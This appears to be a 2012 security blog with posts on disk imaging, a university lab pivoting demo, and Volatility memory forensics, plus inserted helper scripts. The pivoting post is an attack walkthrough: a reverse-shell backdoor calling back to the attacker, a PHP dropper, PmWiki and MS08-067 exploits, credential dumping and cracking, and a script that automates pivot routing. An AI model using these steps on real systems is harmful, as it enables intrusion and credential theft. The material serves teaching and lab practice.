Monday, 21 May 2012

Restore files / Image acquisition 101

First of all, let's acquire an image of the disk in question so we can recover the files from the copy rather than from the original.

Boot your BackTrack disc (USB or CD does not matter that much) and choose the Forensics mode, which mounts no disks and uses no swap, so nothing on the evidence drive gets written to.

Check which disks/partitions we have:

dmesg | grep sd

Image both partitions and stream them straight to the workstation where you will be doing the work. dcfldd can hash the data as it copies (hash=sha256 hashlog=...); at the very least, hash the image at both ends afterwards and make sure the values match before you touch it.

dcfldd if=/dev/sda1 | ssh username@hostname "dd of=/path/on/the/remote/machine/sda1.img"

dcfldd if=/dev/sda2 | ssh username@hostname "dd of=/path/on/the/remote/machine/sda2.img"
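As an added example (my code, not from the post), here is a small sh function for the copy-and-verify step: it images a device or file with plain dd, writes the image and hashes the stream in one pass, then hashes the written image independently and only reports success when the two match. Tool names and paths are the post's; the demo input at the bottom is a constructed file standing in for /dev/sda1.

```shell
#!/bin/sh
# Added example: image a block device (or any file standing in for one) and
# verify the copy by hashing both the source stream and the written image.
# Plain dd/sha256sum are used so it runs anywhere; dcfldd's hash= option does
# the source-side hash in one pass. On a damaged disk use dcfldd/ddrescue with
# conv=noerror,sync instead of bare dd so bad sectors do not shift offsets.
acquire_image() {
    src="$1"
    dst="$2"
    # Read the source exactly once: dd streams it into tee, which writes the
    # image file and feeds a copy to sha256sum for the source hash.
    src_hash=$(dd if="$src" bs=1048576 2>/dev/null | tee "$dst" | sha256sum | cut -d' ' -f1)
    # Hash the written image separately; a mismatch means the copy is bad.
    img_hash=$(sha256sum "$dst" | cut -d' ' -f1)
    # Keep both values next to the image as the acquisition record.
    printf '%s  source\n%s  image\n' "$src_hash" "$img_hash" > "$dst.sha256"
    [ "$src_hash" = "$img_hash" ]
}

# Over the network, as in the post, do the same in two halves:
#   dcfldd if=/dev/sda1 hash=sha256 hashlog=sda1.sha256 | ssh user@host "dd of=/path/sda1.img"
#   ssh user@host sha256sum /path/sda1.img    # compare with sda1.sha256 by hand

# Demo on a constructed stand-in for a partition (no real device needed):
demo_dir=$(mktemp -d)
printf 'constructed partition contents' > "$demo_dir/sda1"
acquire_image "$demo_dir/sda1" "$demo_dir/sda1.img" && echo "image verified: $demo_dir/sda1.img"
```

Run it as root against the real device (`acquire_image /dev/sda1 /mnt/case/sda1.img`) once the stand-in works; the `.sha256` file is what you quote when asked to show the image is a faithful copy.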

Now let's convert the raw images to VMware disks. qemu-img does it in one step:

qemu-img convert -f raw /storage/data/recover/sda1.img -O vmdk /storage/data/recover/vmware-sda1.vmdk

or

wget -O raw2vmdk-0.1.3.1-jar.tar.gz "http://downloads.sourceforge.net/project/raw2vmdk/raw2vmdk-0.1.3.1-jar.tar.gz?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fraw2vmdk%2F&ts=1337595038&use_mirror=kent"

tar -zxvf raw2vmdk-0.1.3.1-jar.tar.gz
rm raw2vmdk-0.1.3.1-jar.tar.gz
cd raw2vmdk-0.1.3.1-jar

java -jar raw2vmdk.jar /storage/data/recover/sda2.img /storage/data/recover/vmware-sda2.vmdk


Now attach the VMDKs to a VMware guest as extra, non-boot disks (keep the raw .img files untouched and work only on the converted copies) and restore files from inside the guest using one of:

DiskDigger (needs licence)
Recuva (free)
FreeRecover (free)
File Scavenger (needs licence)


Stay tuned :)

Tuesday, 15 May 2012

UoB pivoting demo

These are the notes from a quick demo I did at the University of Bedfordshire. Enjoy.

  • Open Armitage
  • Scan (nmap) 172.16.128.x and find the web server
db_nmap -sT -Pn -T5 -O --open 172.16.128.1/24
  • Find attacks
  • Visit the site (http://172.16.128.3) and attack
  • Exploit using CVE-2011-4453 (PmWiki pagelist). The Armitage GUI fails here, so use the console:
use exploit/multi/http/pmwiki_pagelist
set rhost 172.16.128.3
exploit -j
sessions -v
  • Check out the system (sysinfo, ps, getuid). No hashdump/winenum/route: PHP Meterpreter does not have the full functionality, so...
  • Create a backdoor
msfpayload windows/x64/meterpreter/reverse_tcp LHOST=172.16.128.10 LPORT=8443 EXITFUNC=thread X > /root/Tools/runme.exe
  • cat /root/Tools/meh.php
<?php
// system() blocks until runme.exe exits, so the request that fetches this page
// hangs for as long as the Meterpreter session is alive. That is expected.
system("runme.exe");
?>
  • Upload both meh.php and runme.exe
lcd /root/Tools
upload meh.php
upload runme.exe
  • Start a listener
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set exitfunc thread
set lhost 172.16.128.10
set lport 8443
exploit -j
  • Open a terminal and fetch the page to trigger the dropper
wget http://172.16.128.3/meh.php
  • The second session now runs with full SYSTEM privileges, inherited from the web server process that launched runme.exe
  • Get hashdump
  • Crack with ophcrack
  • Check out the routes with ipconfig/route (time to pivot!) and point Metasploit at the second subnet through session 2. Use the network address, not a host in it:
route add 10.1.87.0 255.255.255.0 2
  • Scan that subnet with the Meterpreter ARP scanner
run arp_scanner -r 10.1.87.0/24
  • Scan the hosts with the Metasploit TCP port scanner (auxiliary/scanner/portscan/tcp), which now goes through the pivot
  • Locate windows server
  • Locate linux server
  • Compromise the Windows box. A bind payload is used because 10.1.87.4 has no route back to the attacker; Metasploit reaches the bind port through session 2
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/bind_tcp
set RHOST 10.1.87.4
exploit -j
  • Take hash and crack with ophcrack
  • Create a forwarding tunnel through the session to look at the Linux box's web server from our own browser
portfwd add -l 8080 -p 80 -r 10.1.87.5
  • Test the php-cgi argument-injection exploit (CVE-2012-1823) on it in a local browser: http://localhost:8080/configuration.php?-s dumps the script's source if it is vulnerable
  • Compromise the Linux box over SSH with the guessed root credentials
use auxiliary/scanner/ssh/ssh_login
set USERNAME root
set PASSWORD password
set RHOSTS 10.1.87.5
run -j
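The "time to pivot" step above is where people get the route wrong (a host address instead of the network, as the original notes had). As an added example, not part of the demo, this Python helper reads the pivot host's ipconfig output, works out which attached networks are not already reachable from the attacker, and prints the msfconsole route and Meterpreter arp_scanner commands with the correct network address and mask. The ipconfig text is constructed for the example (Windows 7 wording), using the addresses from the notes.

```python
import ipaddress
import re

# Constructed sample of `ipconfig` on the compromised web server (172.16.128.3),
# which also sits on the internal 10.1.87.0/24 network. Made up for this example.
SAMPLE_IPCONFIG = """
Windows IP Configuration

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 172.16.128.3
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.128.1

Ethernet adapter Local Area Connection 2:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 10.1.87.3
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :
"""

# Windows 7 ipconfig labels; XP prints "IP Address" instead of "IPv4 Address".
ADDR_RE = re.compile(r"IPv4 Address[ .]*: (\S+)")
MASK_RE = re.compile(r"Subnet Mask[ .]*: (\S+)")


def attached_networks(ipconfig_text):
    """Return the IPv4 networks the host is directly attached to, one per adapter."""
    nets = []
    # Each adapter section starts with "... adapter <name>:"; the first chunk is the banner.
    for block in ipconfig_text.split("adapter")[1:]:
        addr = ADDR_RE.search(block)
        mask = MASK_RE.search(block)
        if addr and mask:
            # IPv4Interface accepts a dotted-quad mask and .network drops the host bits,
            # which is exactly the "10.1.87.0" Metasploit's route command wants.
            nets.append(ipaddress.IPv4Interface(f"{addr.group(1)}/{mask.group(1)}").network)
    return nets


def pivot_commands(ipconfig_text, session_id, attacker_ip):
    """Build (context, command) pairs to pivot into every network the host
    can reach that the attacker cannot reach directly."""
    attacker = ipaddress.IPv4Address(attacker_ip)
    cmds = []
    for net in attached_networks(ipconfig_text):
        if attacker in net:
            continue  # we are already on this network; nothing to route
        cmds.append(("msfconsole", f"route add {net.network_address} {net.netmask} {session_id}"))
        cmds.append(("meterpreter", f"run arp_scanner -r {net.with_prefixlen}"))
    return cmds


if __name__ == "__main__":
    # Session 2 is the native Meterpreter from the demo; LHOST was 172.16.128.10.
    for context, cmd in pivot_commands(SAMPLE_IPCONFIG, 2, "172.16.128.10"):
        print(f"[{context}] {cmd}")
```

Paste the real ipconfig output from the session in place of the sample; the `route add` line is typed at the msf prompt and the `arp_scanner` line inside the Meterpreter session.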

That's all for now.
Stay tuned :)

Friday, 4 May 2012

Volatility taster


On our BackTrack system, let's set up a quick Samba share to receive the memory dump (guest-writable, so only do this on an isolated lab network):
  • apt-get install samba
  • vi /etc/samba/smb.conf (comment out all the existing shares and add just the following)
[btshare] 
   comment = btshare 
   path = /btshare 
   read only = no 
   guest ok = yes 
   browsable = yes
save and exit
  • mkdir /btshare
  • chmod 777 /btshare
  • service smbd restart

On the target system, open the USB stick with DEFT on it.
Run DEFT Extra and decide where your audit log will go.
Go to Acquire and launch the trusted shell (it uses the known-good tools from the stick rather than whatever is on the suspect system) to run win32dd or win64dd, writing straight to the share (/r = raw dump, /f = output file):
  • win64dd /r /f \\192.168.1.7\btshare\win7memory.img
Back on the BackTrack box, fetch Volatility and run it against the dump:
  • cd /root/Tools/
  • svn checkout http://volatility.googlecode.com/svn/trunk Volatility
  • cd Volatility
  • chmod +x vol.py
  • ./vol.py -f /btshare/win7memory.img imageinfo
(note the suggested profile and use it for everything below; Win7SP1x64 is what this dump came back with)
  • ./vol.py -f /btshare/win7memory.img --profile=Win7SP1x64 pslist
  • ./vol.py -f /btshare/win7memory.img --profile=Win7SP1x64 netscan
(connections and connscan only work on XP/2003 images; on Vista and later netscan is the one that lists sockets and connections)
  • ./vol.py -f /btshare/win7memory.img --profile=Win7SP1x64 hivescan
  • ./vol.py -f /btshare/win7memory.img --profile=Win7SP1x64 hivelist
(hivescan prints the physical offsets of the registry hives, e.g. 0x031da010; hivelist takes no argument and lists their virtual addresses, which is what the registry plugins want)
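The pslist output is only useful if you know what a normal Windows 7 process tree looks like. As an added example (my code, not Volatility's), this script parses Volatility 2.x pslist output and flags processes whose parent is not the one Windows always uses: svchost.exe must come from services.exe, and services.exe/lsass.exe/lsm.exe from wininit.exe. The pslist text is constructed for the example; it shows a typical Win7 tree with one planted anomaly, a svchost.exe launched by explorer.exe.

```python
# Constructed sample of `vol.py --profile=Win7SP1x64 pslist` output (made up for
# this example; the process tree is typical for Win7 except for PID 2212).
SAMPLE_PSLIST = """
Offset(V)          Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xfffffa8003a5c9e0 System                    4      0     89      465 ------      0 2012-05-04 09:00:01 UTC+0000
0xfffffa80046f9b30 smss.exe                240      4      2       29 ------      0 2012-05-04 09:00:01 UTC+0000
0xfffffa8004e2d060 csrss.exe               332    324      9      420      0      0 2012-05-04 09:00:03 UTC+0000
0xfffffa8004e4ab30 wininit.exe             380    324      3       77      0      0 2012-05-04 09:00:03 UTC+0000
0xfffffa80050a1b30 services.exe            476    380      8      214      0      0 2012-05-04 09:00:04 UTC+0000
0xfffffa80050b4b30 lsass.exe               484    380      7      572      0      0 2012-05-04 09:00:04 UTC+0000
0xfffffa8005201b30 svchost.exe             596    476     10      353      0      0 2012-05-04 09:00:05 UTC+0000
0xfffffa80052e6b30 explorer.exe           1560   1532     21      745      1      0 2012-05-04 09:01:10 UTC+0000
0xfffffa8005a77b30 svchost.exe            2212   1560      3       68      1      0 2012-05-04 09:45:32 UTC+0000
0xfffffa8005b11060 notepad.exe            2348   1560      1       40      1      0 2012-05-04 09:45:40 UTC+0000
"""

# Windows 7 process-tree rules: these images are always started by these parents.
# Anything else is either injection/masquerading or a launcher that needs explaining.
EXPECTED_PARENT = {
    "services.exe": "wininit.exe",
    "lsass.exe": "wininit.exe",
    "lsm.exe": "wininit.exe",
    "svchost.exe": "services.exe",
    "taskhost.exe": "services.exe",
}


def parse_pslist(text):
    """Return {pid: (name, ppid)} from Volatility 2.x pslist output."""
    procs = {}
    for line in text.splitlines():
        fields = line.split()
        # Data rows start with the 0x... virtual offset; header and separator rows do not.
        if len(fields) < 4 or not fields[0].startswith("0x"):
            continue
        name, pid, ppid = fields[1], int(fields[2]), int(fields[3])
        procs[pid] = (name, ppid)
    return procs


def suspicious_parents(procs):
    """Return (name, pid, parent_name) for every process with the wrong parent."""
    findings = []
    for pid, (name, ppid) in sorted(procs.items()):
        want = EXPECTED_PARENT.get(name.lower())
        if want is None:
            continue
        # A parent that already exited shows up as an unknown PID; report it as such.
        parent_name = procs.get(ppid, ("<exited/unknown>", None))[0]
        if parent_name.lower() != want:
            findings.append((name, pid, parent_name))
    return findings


if __name__ == "__main__":
    for name, pid, parent in suspicious_parents(parse_pslist(SAMPLE_PSLIST)):
        print(f"{name} (PID {pid}) was started by {parent}")
```

Feed it the real output (`./vol.py ... pslist > pslist.txt`) and extend EXPECTED_PARENT with whatever else the box is supposed to run; a svchost.exe under explorer.exe, as in the sample, is the classic thing to chase with dlllist and malfind next.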

More to come :)